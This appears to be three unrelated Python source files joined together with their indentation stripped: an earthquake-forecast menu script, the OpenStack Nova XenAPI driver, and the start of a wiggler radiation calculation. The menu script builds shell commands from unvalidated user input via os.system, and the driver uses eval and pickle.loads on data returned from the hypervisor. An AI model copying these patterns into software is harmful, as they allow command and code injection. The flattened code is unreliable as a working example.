os.system("python generate_catalog_file.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
#.....................................
rmenu = ''
print ' '
print ' This is the basic code to set up the menu of choices'
while rmenu != 'Z':
print ' '
print ' ...........................................'
print ' '
print ' Current location is: ', Location
print ' '
print ' A: Input Location and Catalog Parameters'
print ' B: Generate or Re-Generate Working Catalog File'
print ' C: Edit Working Catalog File (for Macs Only)'
print ' D: Plot EQ Magnitude vs. Time'
print ' E: Plot EQ Epicenters on a Map'
print ' F: Plot NTW Earthquake Forecast on a Map'
print ' G: Plot Gutenberg-Richter Relation for an Inter-Earthquake Sequence'
print ' H: Plot Earthquake NowCast for Regional Area'
print ' I: Plot Earthquake NowCast for Circle within Regional Area'
print ' J: Plot Earthquake NowCast for Polygon within Regional Area'
print ' K: Plot Proxy Strain vs. Time in the Region'
print ' L: Plot Proxy Strain vs. Time in the Circle'
# print ' M: Plot Earthquake Forecast vs. Time in the Circle'
# print ' N: Plot Filtered Earthquake NowCast for Regional Area (Same as H but Log10-Linear)'
print ' '
print ' Z: Get Me Out of Here!'
print ' '
print ' (You must choose ... but choose wisely!'
print ' For a true choice will bring you joy,'
print ' but a poor choice will take it from you...)'
print ' '
rmenu = ''
rmenu = raw_input("Enter a Choice: \n")
print ' '
#.....................................
if rmenu == 'B':
print 'Choice B: Generate or Re-Generate Working Catalog File'
os.system("python generate_catalog_file.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'C':
print 'Choice C: Open Working Catalog File in Text Editor'
# os.system("open -t EQ_Working_Catalog.txt") # Only for Macs. For other systems, substitute something like "gedit EQ_Working_Catalog.txt"
os.system("open -e EQ_Working_Catalog.txt") # Forces file open with Mac app Textedit
if rmenu == 'D':
print 'Choice D: Plot EQ Magnitude vs. Time'
os.system("python plot_ANSS_seismicity.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'E':
print 'Choice E: Plot EQ Epicenters on a Map'
os.system("python plot_ANSS_epicenters.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'F':
print 'Choice F: Plot NTW EQ Forecast on a Map'
os.system("python contour_eq_probs.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'G':
print 'Choice G: Plot Gutenberg-Richter relation (Cumulative frequency-magnitude)'
os.system("python plot_GR_relation.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'H':
print 'Choice H: Plot Earthquake EPS in Region (Defined by histogram of small earthquake counts)'
os.system("python plot_EQ_EPS_Region.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'I':
print 'Choice I: Plot Earthquake EPS in Circle within Region (Defined by histogram of small earthquake counts)'
os.system("python plot_EQ_EPS_Region_Circle.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'J':
print 'Choice J: Plot Earthquake EPS in Polygon within Region (Defined by histogram of small earthquake counts)'
os.system("python plot_EQ_EPS_Region_Polygon.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'K':
print 'Choice K: Plot Proxy Strain vs. Time in the Region'
os.system("python plot_proxy_strain_vs_time_region.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'L':
print 'Choice L: Plot Proxy Strain vs. Time in the Circle'
os.system("python plot_proxy_strain_vs_time_circle.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'M':
print 'Choice M: Plot Forecast in Circle within Region (Defined by histogram of small earthquake counts)'
os.system("python plot_Forecast_EPS_Region_Circle.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'N':
print 'Choice N: Plot Filtered Earthquake EPS in Region (Defined by histogram of small earthquake counts)'
os.system("python plot_Filtered_EQ_EPS_Region.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
if rmenu == 'A':
print 'Choice A: Enter the map and plot parameters (Default is California)'
print ' '
print ' Enter a different predefined location or large earthquake magnitude? (y/n)'
respl = raw_input()
if respl == 'y':
#......................................
print ' '
print ' Current pre-defined Locations are: '
print ' '
for j in range(number_locations):
print ' ', Location_file[j]
#......................................
print ' '
print ' Current location is: ', Location
print ' Enter new location (Case sensitive: Overrides previous parameter set):'
Location = raw_input()
location_flag = 0
for j in range(number_locations):
if Location == Location_file[j]:
SWLat = MinLat_file[j]
NELat = MaxLat_file[j]
SWLng = MinLng_file[j]
NELng = MaxLng_file[j]
location_flag = 1
Last_location = Location
if location_flag == 0:
print ' '
print ' Invalid location, try again...'
Location = Last_location
print ' '
print ' Minimum magnitude (for large earthquakes) is currently set at: ', MagLo
print ' Enter new minimum magnitude? (y/n)'
respm = raw_input()
if respm == 'y':
print ' '
print ' Current minimum magnitude is: ', MagLo
print ' Enter new minimum magnitude (must be M>5.0):'
MagLo = raw_input()
if respl !='y':
print ' '
print ' Enter parameters (Lats, Longs, Location Name?) (y/n)'
respp = raw_input()
if respp == 'y':
print ' '
print ' Enter Min Lat, Max Lat, Min Long, Max Long, Location Name'
print '>>>>>> (Requires 5 parameters separated by commas)'
items = raw_input().split(',')
print ' '
print ' You Entered: ', items
print ' '
SWLat = items[0]
NELat = items[1]
SWLng = items[2]
NELng = items[3]
Location = items[4]
print 'Downloading catalog data for new location and/or with new minimum magnitude'
os.system("python generate_catalog_file.py {0} {1} {2} {3} {4} {5}".format(NELat, NELng, SWLat, SWLng, MagLo, Location))
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright 2010 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A driver for XenServer or Xen Cloud Platform.
**Related Flags**
:xenapi_connection_url: URL for connection to XenServer/Xen Cloud Platform.
:xenapi_connection_username: Username for connection to XenServer/Xen Cloud
Platform (default: root).
:xenapi_connection_password: Password for connection to XenServer/Xen Cloud
Platform.
:target_host: the iSCSI Target Host IP address, i.e. the IP
address for the nova-volume host
:target_port: iSCSI Target Port, 3260 Default
:iqn_prefix: IQN Prefix, e.g. 'iqn.2010-10.org.openstack'
**Variable Naming Scheme**
- suffix "_ref" for opaque references
- suffix "_uuid" for UUIDs
- suffix "_rec" for record objects
"""
import contextlib
import cPickle as pickle
import urlparse
import xmlrpclib
from eventlet import queue
from eventlet import timeout
from oslo.config import cfg
from nova import context
from nova import exception
from nova.openstack.common import log as logging
from nova.virt import driver
from nova.virt.xenapi import host
from nova.virt.xenapi import pool
from nova.virt.xenapi import pool_states
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import vmops
from nova.virt.xenapi import volumeops
LOG = logging.getLogger(__name__)
xenapi_opts = [
cfg.StrOpt('xenapi_connection_url',
default=None,
help='URL for connection to XenServer/Xen Cloud Platform. '
'Required if compute_driver=xenapi.XenAPIDriver'),
cfg.StrOpt('xenapi_connection_username',
default='root',
help='Username for connection to XenServer/Xen Cloud Platform. '
'Used only if compute_driver=xenapi.XenAPIDriver'),
cfg.StrOpt('xenapi_connection_password',
default=None,
help='Password for connection to XenServer/Xen Cloud Platform. '
'Used only if compute_driver=xenapi.XenAPIDriver',
secret=True),
cfg.IntOpt('xenapi_connection_concurrent',
default=5,
help='Maximum number of concurrent XenAPI connections. '
'Used only if compute_driver=xenapi.XenAPIDriver'),
cfg.FloatOpt('xenapi_vhd_coalesce_poll_interval',
default=5.0,
help='The interval used for polling of coalescing vhds. '
'Used only if compute_driver=xenapi.XenAPIDriver'),
cfg.BoolOpt('xenapi_check_host',
default=True,
help='Ensure compute service is running on host XenAPI '
'connects to.'),
cfg.IntOpt('xenapi_vhd_coalesce_max_attempts',
default=5,
help='Max number of times to poll for VHD to coalesce. '
'Used only if compute_driver=xenapi.XenAPIDriver'),
cfg.StrOpt('xenapi_sr_base_path',
default='/var/run/sr-mount',
help='Base path to the storage repository'),
cfg.StrOpt('target_host',
default=None,
help='iSCSI Target Host'),
cfg.StrOpt('target_port',
default='3260',
help='iSCSI Target Port, 3260 Default'),
cfg.StrOpt('iqn_prefix',
default='iqn.2010-10.org.openstack',
help='IQN Prefix'),
# NOTE(sirp): This is a work-around for a bug in Ubuntu Maverick,
# when we pull support for it, we should remove this
cfg.BoolOpt('xenapi_remap_vbd_dev',
default=False,
help='Used to enable the remapping of VBD dev '
'(Works around an issue in Ubuntu Maverick)'),
cfg.StrOpt('xenapi_remap_vbd_dev_prefix',
default='sd',
help='Specify prefix to remap VBD dev to '
'(ex. /dev/xvdb -> /dev/sdb)'),
cfg.IntOpt('xenapi_login_timeout',
default=10,
help='Timeout in seconds for XenAPI login.'),
]
CONF = cfg.CONF
CONF.register_opts(xenapi_opts)
CONF.import_opt('host', 'nova.netconf')
class XenAPIDriver(driver.ComputeDriver):
"""A connection to XenServer or Xen Cloud Platform."""
def __init__(self, virtapi, read_only=False):
super(XenAPIDriver, self).__init__(virtapi)
url = CONF.xenapi_connection_url
username = CONF.xenapi_connection_username
password = CONF.xenapi_connection_password
if not url or password is None:
raise Exception(_('Must specify xenapi_connection_url, '
'xenapi_connection_username (optionally), and '
'xenapi_connection_password to use '
'compute_driver=xenapi.XenAPIDriver'))
self._session = XenAPISession(url, username, password, self.virtapi)
self._volumeops = volumeops.VolumeOps(self._session)
self._host_state = None
self._host = host.Host(self._session, self.virtapi)
self._vmops = vmops.VMOps(self._session, self.virtapi)
self._initiator = None
self._hypervisor_hostname = None
self._pool = pool.ResourcePool(self._session, self.virtapi)
@property
def host_state(self):
if not self._host_state:
self._host_state = host.HostState(self._session)
return self._host_state
def init_host(self, host):
if CONF.xenapi_check_host:
vm_utils.ensure_correct_host(self._session)
try:
vm_utils.cleanup_attached_vdis(self._session)
except Exception:
LOG.exception(_('Failure while cleaning up attached VDIs'))
def list_instances(self):
"""List VM instances."""
return self._vmops.list_instances()
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
"""Create VM instance."""
self._vmops.spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info)
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
# TODO(Vek): Need to pass context in for access to auth_token
self._vmops.confirm_migration(migration, instance, network_info)
def finish_revert_migration(self, instance, network_info,
block_device_info=None):
"""Finish reverting a resize, powering back on the instance."""
# NOTE(vish): Xen currently does not use network info.
self._vmops.finish_revert_migration(instance, block_device_info)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance=False,
block_device_info=None):
"""Completes a resize, turning on the migrated instance."""
self._vmops.finish_migration(context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info)
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance."""
self._vmops.snapshot(context, instance, image_id, update_task_state)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None):
"""Reboot VM instance."""
self._vmops.reboot(instance, reboot_type)
def set_admin_password(self, instance, new_pass):
"""Set the root/admin password on the VM instance."""
self._vmops.set_admin_password(instance, new_pass)
def inject_file(self, instance, b64_path, b64_contents):
"""Create a file on the VM instance. The file path and contents
should be base64-encoded.
"""
self._vmops.inject_file(instance, b64_path, b64_contents)
def change_instance_metadata(self, context, instance, diff):
"""Apply a diff to the instance metadata."""
self._vmops.change_instance_metadata(instance, diff)
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
"""Destroy VM instance."""
self._vmops.destroy(instance, network_info, block_device_info,
destroy_disks)
def pause(self, instance):
"""Pause VM instance."""
self._vmops.pause(instance)
def unpause(self, instance):
"""Unpause paused VM instance."""
self._vmops.unpause(instance)
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, network_info,
block_device_info=None):
"""Transfers the VHD of a running instance to another host, then shuts
off the instance copies over the COW disk"""
# NOTE(vish): Xen currently does not use network info.
rv = self._vmops.migrate_disk_and_power_off(context, instance,
dest, instance_type)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
name_label = self._vmops._get_orig_vm_name_label(instance)
for vol in block_device_mapping:
connection_info = vol['connection_info']
mount_device = vol['mount_device'].rpartition("/")[2]
self._volumeops.detach_volume(connection_info,
name_label, mount_device)
return rv
def suspend(self, instance):
"""suspend the specified instance."""
self._vmops.suspend(instance)
def resume(self, instance, network_info, block_device_info=None):
"""resume the specified instance."""
self._vmops.resume(instance)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Rescue the specified instance."""
self._vmops.rescue(context, instance, network_info, image_meta,
rescue_password)
def unrescue(self, instance, network_info):
"""Unrescue the specified instance."""
self._vmops.unrescue(instance)
def power_off(self, instance):
"""Power off the specified instance."""
self._vmops.power_off(instance)
def power_on(self, instance):
"""Power on the specified instance."""
self._vmops.power_on(instance)
def soft_delete(self, instance):
"""Soft delete the specified instance."""
self._vmops.soft_delete(instance)
def restore(self, instance):
"""Restore the specified instance."""
self._vmops.restore(instance)
def poll_rebooting_instances(self, timeout, instances):
"""Poll for rebooting instances."""
self._vmops.poll_rebooting_instances(timeout, instances)
def reset_network(self, instance):
"""reset networking for specified instance."""
self._vmops.reset_network(instance)
def inject_network_info(self, instance, network_info):
"""inject network info for specified instance."""
self._vmops.inject_network_info(instance, network_info)
def plug_vifs(self, instance_ref, network_info):
"""Plug VIFs into networks."""
self._vmops.plug_vifs(instance_ref, network_info)
def unplug_vifs(self, instance_ref, network_info):
"""Unplug VIFs from networks."""
self._vmops.unplug_vifs(instance_ref, network_info)
def get_info(self, instance):
"""Return data about VM instance."""
return self._vmops.get_info(instance)
def get_diagnostics(self, instance):
"""Return data about VM diagnostics."""
return self._vmops.get_diagnostics(instance)
def get_all_bw_counters(self, instances):
"""Return bandwidth usage counters for each interface on each
running VM"""
# we only care about VMs that correspond to a nova-managed
# instance:
imap = dict([(inst['name'], inst['uuid']) for inst in instances])
bwcounters = []
# get a dictionary of instance names. values are dictionaries
# of mac addresses with values that are the bw counters:
# e.g. {'instance-001' : { 12:34:56:78:90:12 : {'bw_in': 0, ....}}
all_counters = self._vmops.get_all_bw_counters()
for instance_name, counters in all_counters.iteritems():
if instance_name in imap:
# yes these are stats for a nova-managed vm
# correlate the stats with the nova instance uuid:
for vif_counter in counters.values():
vif_counter['uuid'] = imap[instance_name]
bwcounters.append(vif_counter)
return bwcounters
def get_console_output(self, instance):
"""Return snapshot of console."""
return self._vmops.get_console_output(instance)
def get_vnc_console(self, instance):
"""Return link to instance's VNC console."""
return self._vmops.get_vnc_console(instance)
def get_volume_connector(self, instance):
"""Return volume connector information."""
if not self._initiator or not self._hypervisor_hostname:
stats = self.get_host_stats(refresh=True)
try:
self._initiator = stats['host_other-config']['iscsi_iqn']
self._hypervisor_hostname = stats['host_hostname']
except (TypeError, KeyError) as err:
LOG.warn(_('Could not determine key: %s') % err,
instance=instance)
self._initiator = None
return {
'ip': self.get_host_ip_addr(),
'initiator': self._initiator,
'host': self._hypervisor_hostname
}
@staticmethod
def get_host_ip_addr():
xs_url = urlparse.urlparse(CONF.xenapi_connection_url)
return xs_url.netloc
def attach_volume(self, connection_info, instance, mountpoint):
"""Attach volume storage to VM instance."""
return self._volumeops.attach_volume(connection_info,
instance['name'],
mountpoint)
def detach_volume(self, connection_info, instance, mountpoint):
"""Detach volume storage to VM instance."""
return self._volumeops.detach_volume(connection_info,
instance['name'],
mountpoint)
def get_console_pool_info(self, console_type):
xs_url = urlparse.urlparse(CONF.xenapi_connection_url)
return {'address': xs_url.netloc,
'username': CONF.xenapi_connection_username,
'password': CONF.xenapi_connection_password}
def get_available_resource(self, nodename):
"""Retrieve resource info.
This method is called when nova-compute launches, and
as part of a periodic task.
:param nodename: ignored in this driver
:returns: dictionary describing resources
"""
host_stats = self.get_host_stats(refresh=True)
# Updating host information
total_ram_mb = host_stats['host_memory_total'] / (1024 * 1024)
# NOTE(belliott) memory-free-computed is a value provided by XenServer
# for gauging free memory more conservatively than memory-free.
free_ram_mb = host_stats['host_memory_free_computed'] / (1024 * 1024)
total_disk_gb = host_stats['disk_total'] / (1024 * 1024 * 1024)
used_disk_gb = host_stats['disk_used'] / (1024 * 1024 * 1024)
dic = {'vcpus': 0,
'memory_mb': total_ram_mb,
'local_gb': total_disk_gb,
'vcpus_used': 0,
'memory_mb_used': total_ram_mb - free_ram_mb,
'local_gb_used': used_disk_gb,
'hypervisor_type': 'xen',
'hypervisor_version': 0,
'hypervisor_hostname': host_stats['host_hostname'],
'cpu_info': host_stats['host_cpu_info']['cpu_count']}
return dic
def ensure_filtering_rules_for_instance(self, instance_ref, network_info):
# NOTE(salvatore-orlando): it enforces security groups on
# host initialization and live migration.
# In XenAPI we do not assume instances running upon host initialization
return
def check_can_live_migrate_destination(self, ctxt, instance_ref,
src_compute_info, dst_compute_info,
block_migration=False, disk_over_commit=False):
"""Check if it is possible to execute live migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
"""
return self._vmops.check_can_live_migrate_destination(ctxt,
instance_ref,
block_migration,
disk_over_commit)
def check_can_live_migrate_destination_cleanup(self, ctxt,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param ctxt: security context
:param disk_over_commit: if true, allow disk over commit
"""
pass
def check_can_live_migrate_source(self, ctxt, instance_ref,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
includes the block_migration flag
"""
return self._vmops.check_can_live_migrate_source(ctxt, instance_ref,
dest_check_data)
def get_instance_disk_info(self, instance_name):
"""Used by libvirt for live migration. We rely on xenapi
checks to do this for us."""
pass
def pre_block_migration(self, ctxt, instance_ref, disk_info_json):
"""Used by libvirt for live migration. We rely on xenapi
checks to do this for us. May be used in the future to
populate the vdi/vif maps"""
pass
def live_migration(self, ctxt, instance_ref, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Performs the live migration of the specified instance.
:params ctxt: security context
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params block_migration: if true, migrate VM disk.
:params migrate_data: implementation specific params
"""
self._vmops.live_migrate(ctxt, instance_ref, dest, post_method,
recover_method, block_migration, migrate_data)
def pre_live_migration(self, context, instance_ref, block_device_info,
network_info, migrate_data=None):
"""Preparation live migration.
:params block_device_info:
It must be the result of _get_instance_volume_bdms()
at compute manager.
"""
# TODO(JohnGarbutt) look again when boot-from-volume hits trunk
pass
def post_live_migration_at_destination(self, ctxt, instance_ref,
network_info, block_migration,
block_device_info=None):
"""Post operation of live migration at destination host.
:params ctxt: security context
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params network_info: instance network information
:params : block_migration: if true, post operation of block_migraiton.
"""
# TODO(JohnGarbutt) look at moving/downloading ramdisk and kernel
pass
def unfilter_instance(self, instance_ref, network_info):
"""Removes security groups configured for an instance."""
return self._vmops.unfilter_instance(instance_ref, network_info)
def refresh_security_group_rules(self, security_group_id):
"""Updates security group rules for all instances associated with a
given security group.
Invoked when security group rules are updated."""
return self._vmops.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
"""Updates security group rules for all instances associated with a
given security group.
Invoked when instances are added/removed to a security group."""
return self._vmops.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
"""Updates security group rules for specified instance.
Invoked when instances are added/removed to a security group
or when a rule is added/removed to a security group."""
return self._vmops.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
return self._vmops.refresh_provider_fw_rules()
def get_host_stats(self, refresh=False):
"""Return the current state of the host. If 'refresh' is
True, run the update first."""
return self.host_state.get_host_stats(refresh=refresh)
def host_power_action(self, host, action):
"""The only valid values for 'action' on XenServer are 'reboot' or
'shutdown', even though the API also accepts 'startup'. As this is
not technically possible on XenServer, since the host is the same
physical machine as the hypervisor, if this is requested, we need to
raise an exception.
"""
if action in ("reboot", "shutdown"):
return self._host.host_power_action(host, action)
else:
msg = _("Host startup on XenServer is not supported.")
raise NotImplementedError(msg)
def set_host_enabled(self, host, enabled):
"""Sets the specified host's ability to accept new instances."""
return self._host.set_host_enabled(host, enabled)
def get_host_uptime(self, host):
"""Returns the result of calling "uptime" on the target host."""
return self._host.get_host_uptime(host)
def host_maintenance_mode(self, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation."""
return self._host.host_maintenance_mode(host, mode)
def add_to_aggregate(self, context, aggregate, host, **kwargs):
"""Add a compute host to an aggregate."""
return self._pool.add_to_aggregate(context, aggregate, host, **kwargs)
def remove_from_aggregate(self, context, aggregate, host, **kwargs):
"""Remove a compute host from an aggregate."""
return self._pool.remove_from_aggregate(context,
aggregate, host, **kwargs)
def undo_aggregate_operation(self, context, op, aggregate,
host, set_error=True):
"""Undo aggregate operation when pool error raised."""
return self._pool.undo_aggregate_operation(context, op,
aggregate, host, set_error)
def legacy_nwinfo(self):
"""
Indicate if the driver requires the legacy network_info format.
"""
# TODO(tr3buchet): remove this function once all virts return false
return False
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
self._vmops.power_on(instance)
def get_per_instance_usage(self):
"""Get information about instance resource usage.
:returns: dict of nova uuid => dict of usage
info
"""
return self._vmops.get_per_instance_usage()
class XenAPISession(object):
"""The session to invoke XenAPI SDK calls."""
def __init__(self, url, user, pw, virtapi):
import XenAPI
self.XenAPI = XenAPI
self._sessions = queue.Queue()
self.is_slave = False
exception = self.XenAPI.Failure(_("Unable to log in to XenAPI "
"(is the Dom0 disk full?)"))
url = self._create_first_session(url, user, pw, exception)
self._populate_session_pool(url, user, pw, exception)
self.host_uuid = self._get_host_uuid()
self.product_version, self.product_brand = \
self._get_product_version_and_brand()
self._virtapi = virtapi
def _create_first_session(self, url, user, pw, exception):
try:
session = self._create_session(url)
with timeout.Timeout(CONF.xenapi_login_timeout, exception):
session.login_with_password(user, pw)
except self.XenAPI.Failure, e:
# if user and pw of the master are different, we're doomed!
if e.details[0] == 'HOST_IS_SLAVE':
master = e.details[1]
url = pool.swap_xapi_host(url, master)
session = self.XenAPI.Session(url)
session.login_with_password(user, pw)
self.is_slave = True
else:
raise
self._sessions.put(session)
return url
def _populate_session_pool(self, url, user, pw, exception):
for i in xrange(CONF.xenapi_connection_concurrent - 1):
session = self._create_session(url)
with timeout.Timeout(CONF.xenapi_login_timeout, exception):
session.login_with_password(user, pw)
self._sessions.put(session)
def _get_host_uuid(self):
if self.is_slave:
aggr = self._virtapi.aggregate_get_by_host(
context.get_admin_context(),
CONF.host, key=pool_states.POOL_FLAG)[0]
if not aggr:
LOG.error(_('Host is member of a pool, but DB '
'says otherwise'))
raise exception.AggregateHostNotFound()
return aggr.metadetails[CONF.host]
else:
with self._get_session() as session:
host_ref = session.xenapi.session.get_this_host(session.handle)
return session.xenapi.host.get_uuid(host_ref)
def _get_product_version_and_brand(self):
"""Return a tuple of (major, minor, rev) for the host version and
a string of the product brand"""
software_version = self._get_software_version()
product_version_str = software_version.get('product_version')
product_brand = software_version.get('product_brand')
if None in (product_version_str, product_brand):
return (None, None)
product_version = tuple(int(part) for part in
product_version_str.split('.'))
return product_version, product_brand
def _get_software_version(self):
host = self.get_xenapi_host()
return self.call_xenapi('host.get_software_version', host)
def get_session_id(self):
"""Return a string session_id. Used for vnc consoles."""
with self._get_session() as session:
return str(session._session)
@contextlib.contextmanager
def _get_session(self):
"""Return exclusive session for scope of with statement."""
session = self._sessions.get()
try:
yield session
finally:
self._sessions.put(session)
def get_xenapi_host(self):
"""Return the xenapi host on which nova-compute runs on."""
with self._get_session() as session:
return session.xenapi.host.get_by_uuid(self.host_uuid)
def call_xenapi(self, method, *args):
"""Call the specified XenAPI method on a background thread."""
with self._get_session() as session:
return session.xenapi_request(method, args)
def call_plugin(self, plugin, fn, args):
"""Call host.call_plugin on a background thread."""
# NOTE(johannes): Fetch host before we acquire a session. Since
# get_xenapi_host() acquires a session too, it can result in a
# deadlock if multiple greenthreads race with each other. See
# bug 924918
host = self.get_xenapi_host()
# NOTE(armando): pass the host uuid along with the args so that
# the plugin gets executed on the right host when using XS pools
args['host_uuid'] = self.host_uuid
with self._get_session() as session:
return self._unwrap_plugin_exceptions(
session.xenapi.host.call_plugin,
host, plugin, fn, args)
def call_plugin_serialized(self, plugin, fn, *args, **kwargs):
params = {'params': pickle.dumps(dict(args=args, kwargs=kwargs))}
rv = self.call_plugin(plugin, fn, params)
return pickle.loads(rv)
def _create_session(self, url):
"""Stubout point. This can be replaced with a mock session."""
return self.XenAPI.Session(url)
def _unwrap_plugin_exceptions(self, func, *args, **kwargs):
"""Parse exception details."""
try:
return func(*args, **kwargs)
except self.XenAPI.Failure, exc:
LOG.debug(_("Got exception: %s"), exc)
if (len(exc.details) == 4 and
exc.details[0] == 'XENAPI_PLUGIN_EXCEPTION' and
exc.details[2] == 'Failure'):
params = None
try:
# FIXME(comstud): eval is evil.
params = eval(exc.details[3])
except Exception:
raise exc
raise self.XenAPI.Failure(params)
else:
raise
except xmlrpclib.ProtocolError, exc:
LOG.debug(_("Got exception: %s"), exc)
raise
def get_rec(self, record_type, ref):
try:
return self.call_xenapi('%s.get_record' % record_type, ref)
except self.XenAPI.Failure, e:
if e.details[0] != 'HANDLE_INVALID':
raise
return None
def get_all_refs_and_recs(self, record_type):
"""Retrieve all refs and recs for a Xen record type.
Handles race-conditions where the record may be deleted between
the `get_all` call and the `get_record` call.
"""
for ref in self.call_xenapi('%s.get_all' % record_type):
rec = self.get_rec(record_type, ref)
# Check to make sure the record still exists. It may have
# been deleted between the get_all call and get_record call
if rec:
yield ref, rec
|
|
"""
File with trajectory written to file: /users/srio/Oasys/tmp.traj
wiggler_cdf: Electron beam energy (from velocities) = 3.000355 GeV
wiggler_cdf: gamma (from velocities) = 5870.853556 GeV
wiggler_cdf: Curvature (min)) = 0.000000 m^-1
wiggler_cdf: (max) 0.199920 m^-1
wiggler_cdf: Radius of curvature (max) = 81689012171814624.000000 m
wiggler_cdf: (min) = 5.002009 m
wiggler_cdf: Critical Energy (max.) = 11973.937061 eV
wiggler_cdf: (min.) = 0.000000 eV
wiggler_cdf: Total no.of photons = 1.690471e+17 (in DE=99900.000 eV)
wiggler_cdf: File with wiggler cdf written to file: b'/users/srio/Oasys/xshwig.sha'
Electron beam energy (from velocities) = 3.000355 GeV
gamma (from velocities) = 5870.851896
curvature (max) = 0.199920 m
(min) = 0.000000 m
Radius of curvature (max) = 81689012171830928.000000 m
(min) = 5.002009 m
Critical Energy (max.) = 11973.926903 eV
(min.) = 0.000000 eV
File with wiggler spectrum written to file: spectrum.dat
Total power (from integral of spectrum): 10106.973910 W
Total number of photons (from integral of spectrum): 1.62115e+19
"""
#
# script to run the wiggler preprocessor (created by ShadowOui:Wiggler)
#
from srxraylib.sources import srfunc
from srxraylib.plot.gol import plot, plot_image, plot_scatter, plot_show
import numpy
from srxraylib.util.h5_simple_writer import H5SimpleWriter
from srxraylib.plot.gol import set_qt
from scipy.interpolate import interp1d
set_qt()
def P(u):
return 2 * numpy.pi / numpy.sqrt(3) * u * srfunc.fintk53(u)
def xoppy_calc_wiggler_radiation(
ELECTRONENERGY = 3.0,
ELECTRONENERGYSPREAD = 0.0,
ELECTRONCURRENT = 0.1,
ELECTRONBEAMSIZEH = 10e-6,
ELECTRONBEAMSIZEV = 10e-6,
ELECTRONBEAMDIVERGENCEH = 10e-6,
ELECTRONBEAMDIVERGENCEV = 10e-6,
PERIODID = 0.120,
NPERIODS = 37,
KV = 22.416,
KH = 0.0,
KPHASE = 0.0,
DISTANCE = 30.0,
GAPH = None,
GAPV = None,
HSLITPOINTS = 500,
VSLITPOINTS = 500,
METHOD = 0,
PHOTONENERGYMIN = 100.0,
PHOTONENERGYMAX = 100100.0,
PHOTONENERGYPOINTS = 101,
USEEMITTANCES = 0,
h5_file = "wiggler_radiation.h5",
h5_entry_name = "XOPPY_RADIATION",
h5_initialize = True,
h5_parameters = None,
):
(traj, pars) = srfunc.wiggler_trajectory(
b_from = 0,
inData = "",
nPer = NPERIODS, #37,
nTrajPoints = HSLITPOINTS,
ener_gev = ELECTRONENERGY,
per = PERIODID,
kValue = KV,
trajFile = "tmp.traj",
shift_x_flag = 0,
shift_x_value = 0.0,
shift_betax_flag = 0,
shift_betax_value = 0.0)
energy, flux, power = srfunc.wiggler_spectrum(traj,
enerMin = PHOTONENERGYMIN,
enerMax = PHOTONENERGYMAX,
nPoints = PHOTONENERGYPOINTS,
electronCurrent = ELECTRONCURRENT,
outFile = "",
elliptical = False)
# #
# # calculate cdf and write file for Shadow/Source
# #
#
# tmp = srfunc.wiggler_cdf(traj,
# enerMin = 100.0,
# enerMax = 100000.0,
